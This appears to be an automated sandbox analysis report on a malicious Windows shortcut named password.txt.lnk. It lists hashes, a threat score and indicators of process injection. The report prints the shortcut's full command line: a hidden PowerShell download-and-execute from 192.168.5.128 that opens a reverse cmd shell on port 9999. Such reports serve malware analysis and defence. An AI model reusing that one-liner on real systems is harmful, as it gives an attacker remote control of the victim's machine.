e927ad9f7f2787687004afe8687f28409d282f4a63d8840661345126c7b8f14e

Analysis

Target

password.txt.lnk
Size

701B
MD5

954d37bb7d20be351e2aeb89ba70a79c
SHA1

eca297fe4ad255ea9bd53294a3da3c449c17551f
SHA256

e927ad9f7f2787687004afe8687f28409d282f4a63d8840661345126c7b8f14e
SHA512

37cc8f55ffa4c2e9ad65e7afaa82d726ec811e521eb9771300d066f600348ba5fbf5771f834ae9dbe4df0e2dc7511b4e0d741c164315327333812181ff37cf67

Score

10^/10

Language

ps1

Source

URLs

ps1.dropper

http://192.168.5.128:8000/svchost.ps1

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

2024 powershell.exe
2024 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2024 powershell.exe

pid	process
2024	powershell.exe
2024	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2024	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

Processes:

cmd.execmd.exepowershell.exe

description	pid	process	target process
PID 1204 wrote to memory of 2016	1204	cmd.exe	cmd.exe
PID 1204 wrote to memory of 2016	1204	cmd.exe	cmd.exe
PID 1204 wrote to memory of 2016	1204	cmd.exe	cmd.exe
PID 2016 wrote to memory of 2024	2016	cmd.exe	powershell.exe
PID 2016 wrote to memory of 2024	2016	cmd.exe	powershell.exe
PID 2016 wrote to memory of 2024	2016	cmd.exe	powershell.exe
PID 2024 wrote to memory of 1520	2024	powershell.exe	svchost.exe
PID 2024 wrote to memory of 1520	2024	powershell.exe	svchost.exe
PID 2024 wrote to memory of 1520	2024	powershell.exe	svchost.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\password.txt.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:1204

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -w hidden -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.5.128:8000/svchost.ps1');svchost -c 192.168.5.128 -p 9999 -e cmd"
2⤵
- Suspicious use of WriteProcessMemory
PID:2016

C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe" -c 192.168.5.128 -p 9999 -e cmd
4⤵
PID:1520

memory/1520-10-0x0000000000000000-mapping.dmp

Download
memory/2016-2-0x0000000000000000-mapping.dmp

Download
memory/2024-3-0x0000000000000000-mapping.dmp

Download
memory/2024-4-0x000007FEF5260000-0x000007FEF5C4C000-memory.dmp

Filesize
9.9MB

Download
memory/2024-5-0x0000000002410000-0x0000000002411000-memory.dmp

Filesize
4KB

Download
memory/2024-6-0x000000001AC10000-0x000000001AC11000-memory.dmp

Filesize
4KB

Download
memory/2024-7-0x0000000002650000-0x0000000002651000-memory.dmp

Filesize
4KB

Download
memory/2024-8-0x00000000025B0000-0x00000000025B1000-memory.dmp

Filesize
4KB

Download
memory/2024-9-0x000000001B640000-0x000000001B641000-memory.dmp

Filesize
4KB

Download